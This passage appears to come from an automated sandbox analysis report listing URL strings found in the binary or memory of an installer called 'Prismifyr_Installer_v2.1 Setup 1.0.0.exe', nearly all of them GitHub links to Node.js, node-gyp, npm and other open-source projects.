Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/joeferner/node-oracle/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jprichardson/node-fs-extra
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/323)).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jprichardson/node-fs-extra/pull/141
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jprichardson/node-jsonfile#readfilefilename-options-callback).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jprichardson/node-jsonfile#readfilesyncfilename-options).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jrmuizel/qcms/tree/v4
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/justinlatimer/node-midi/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/kenchris/urlpattern-polyfill
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/lloyd/node-memwatch/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/lovell/sharp/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/luismreis/node-openvg-canvas/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/luismreis/node-openvg/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/mafintosh/pump
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mapbox/node-zipfile/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mapnik/node-mapnik/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/martine/ninja/blob/master/misc/ninja_syntax.py
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/milani/appjs/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mixu/nwm/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mmod/nk-xrm-installer/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mmod/nk-xrm-installer/blob/master/disburse.py)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mmod/nk-xrm-installer/blob/master/includable.gypi)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mmod/nk-xrm-installer/blob/master/unpack.py)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mmod/nodamysql/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/ncb000gt/node.bcrypt.js)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/ncb000gt/node.bcrypt.js/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/nickdesaulniers/node-nanomsg/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/node4good/windows-autoconf
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/admin/blob/HEAD/CODE_OF_CONDUCT.md)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/admin/blob/HEAD/CODE_OF_CONDUCT.md).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/admin/blob/HEAD/Moderation-Policy.md)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/admin/blob/master/CODE_OF_CONDUCT.md)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/gyp-next
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/gyp-next/archive/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/gyp-next/releases)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-addon-api
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-addon-api#collaborators)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-addon-api/issues
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp#installation
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp#installation)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp#on-macos
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp#on-windows
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp/issues/1779
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp/issues/1861
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp/issues/1927
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp/labels/ERR%21%20node-gyp%20-v%20%3C%3D%20v5.1.0)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp/raw/master/macOS_Catalina_acid_test.sh
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node-gyp/releases).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/blob/c8a04049/lib/internal/errors.js
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/35452
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/44985
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/49472
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/51486
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/issues/52219
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/27791
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/35407#issuecomment-700693439
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/49891#issuecomment-1744673430.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/normalize/mz
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/npm/cacache
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/npm/make-fetch-happen
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/npm/minipass-fetch.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/npm/move-file
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/npm/node-semver.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/npm/nopt.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/npm/ssri
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/ohler/ert
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/oransel/node-talib/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/osmcode/node-osmium/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/polotek/libxmljs/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/protocolbuffers/protobuf-javascript
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/protocolbuffers/protobuf/blob/master/java/lite.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/puppeteer/puppeteer/tree/main/packages/puppeteer-core
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/radioline/node_airtunes/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rbranson/node-ffi/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rbranson/node-ffi/blob/master/deps/libffi/libffi.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/request/request/blob/b12a6245/lib/redirect.js#L134-L138
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/requests/toolbelt
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rvagg/node-leveldown/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rvagg/node-leveldown/blob/master/deps/leveldb/leveldb.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rvagg/node-leveldown/blob/master/deps/snappy/snappy.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/sass/node-sass/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/sass/node-sass/blob/master/src/libsass.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/simplejson/simplejson
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/sinonjs/fake-timers/blob/a4c757f80840829e45e0852ea1b17d87a998388e/src/fake-timers
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/substack/node-mkdirp.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/models
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/tensorflow
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/text.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/tflite-support
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/test262-utils/test262-harness-py
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/voodootikigod/node-serialport/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/ServiceWorker/issues/1356.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/ServiceWorker/issues/1356.Property
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4805
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4805Custom
